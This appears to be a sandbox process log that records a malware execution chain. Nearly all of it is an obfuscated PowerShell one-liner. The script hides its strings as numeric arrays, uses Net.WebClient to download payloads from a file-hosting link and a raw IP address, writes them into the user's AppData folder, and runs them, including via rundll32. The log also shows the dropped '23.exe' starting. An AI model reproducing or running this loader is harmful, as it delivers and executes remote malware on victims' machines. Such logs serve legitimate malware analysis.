powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
208423.exe "C:\Users\test22\AppData\Roaming\23.exe"
2340